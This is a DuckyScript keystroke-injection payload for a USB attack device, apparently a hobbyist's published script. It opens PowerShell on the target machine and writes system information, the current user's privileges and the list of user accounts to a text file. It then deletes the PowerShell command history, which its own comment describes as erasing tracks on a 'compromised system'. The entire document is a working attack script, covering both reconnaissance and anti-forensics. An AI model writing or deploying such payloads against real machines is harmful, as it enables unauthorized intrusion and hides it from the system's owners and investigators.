REM -       wW    Ww      wW  Ww W  W   W  W       .-.        .-.           _  
REM -   wWw(O)\  /(O)  wWw(O)(O)(O)(O) (O)(O)    c(O_O)c    c(O_O)c  (OO) .' ) 
REM -   (O)_`. \/ .'   (O)_(..)   ||     ||     ,'.---.`,  ,'.---.`,  ||_/ .'  
REM -  .' __) \  /    .' __)||    | \    | \   / /|_|_|\ \/ /|_|_|\ \ |   /    
REM - (  _)   /  \   (  _) _||_   |  `.  |  `. | \_____/ || \_____/ | ||\ \    
REM -  `.__).' /\ `.  )/  (_/\_) (.-.__)(.-.__)'. `---' .`'. `---' .`(/\)\ `.  
REM -      (_.'  `._)(            `-'    `-'     `-...-'    `-...-'       `._) 
REM - by Jonmar Corpuz

REM - Open PowerShell.exe
REM -------------------------- 

GUI r
DELAY 500
STRING PowerShell.exe
DELAY 500
ENTER

REM - Enumerate system information
REM -------------------------- 

DELAY 2000
STRING echo 'System information:' > Oops.txt
DELAY 500
ENTER
DELAY 500
STRING systeminfo >> Oops.txt
DELAY 500 
ENTER
DELAY 500
STRING echo '' >> Oops.txt
DELAY 500
ENTER
DELAY 500
STRING echo 'Current user information:' >> Oops.txt
DELAY 500
ENTER
DELAY 700
STRING echo '' >> Oops.txt
DELAY 500
ENTER
DELAY 500
STRING whoami >> Oops.txt
DELAY 500
ENTER
DELAY 500
STRING whoami /priv >> Oops.txt
DELAY 500
ENTER
DELAY 500
STRING echo '' >> Oops.txt
DELAY 500
ENTER
DELAY 500
STRING echo 'List of users:' >> Oops.txt
DELAY 500
ENTER
DELAY 500
STRING echo '' >> Oops.txt
DELAY 500
ENTER
DELAY 500
STRING wmic useraccount list >> Oops.txt
DELAY 500
ENTER
DELAY 500

REM - Erase our tracks from the compromised system
REM -------------------------- 

STRING Notepad.exe Oops.txt; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
DELAY 500
ENTER
